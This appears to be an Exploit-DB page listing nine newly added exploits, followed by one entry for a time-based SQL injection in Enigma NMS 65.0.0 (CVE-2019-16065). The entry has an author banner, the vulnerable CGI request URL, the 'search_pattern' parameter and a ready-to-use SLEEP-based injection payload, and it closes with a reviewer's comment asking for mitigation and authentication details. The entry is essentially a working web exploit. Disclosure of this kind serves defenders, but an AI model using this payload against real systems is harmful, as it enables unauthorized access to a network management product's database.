
9 changes to exploits/shellcodes

WordPress 5.2.3 - Cross-Site Host Modification
Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection
Enigma NMS 65.0.0 - Cross-Site Request Forgery
Enigma NMS 65.0.0 - OS Command Injection
Enigma NMS 65.0.0 - SQL Injection
Online Appointment - SQL Injection
Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure
WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting
Dolibarr ERP-CRM 10.0.1 - SQL Injection
23 lines
No EOL
1.2 KiB
Text
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS search_pattern SQL Injection #
# Date: 21 July 2019 #
# Author: Mark Cross (@xerubus | mogozobo.com) #
# Vendor: NETSAS Pty Ltd #
# Vendor Homepage: https://www.netsas.com.au/ #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
# Version: Enigma NMS 65.0.0 #
# CVE-IDs: CVE-2019-16065 #
# Full write-up: https://www.mogozobo.com/?p=3647 #
#--------------------------------------------------------------------#
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -= Enigma SQLi by @xerubus =-
| D _]/\ \ -= We all have something to hide =-
\___/ / /\ \\
(_ )( _)
@Xerubus
Request: http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern=
Vulnerable Parameter: search_pattern (GET)
Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'='
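
Review bot: The header block gives the affected version (Enigma NMS 65.0.0) and CVE-2019-16065 but no fixed version or mitigation, and the Request line targets a path under /cgi-bin/protected/ without stating whether an authenticated session is required. Suggest adding one line for each, or a line saying the linked write-up covers them, so that someone assessing exposure from this entry alone has what they need. The Payload line also repeats `action=search_proceed&search_pattern=` from the Request line; keeping the query string in one place would make the entry easier to read.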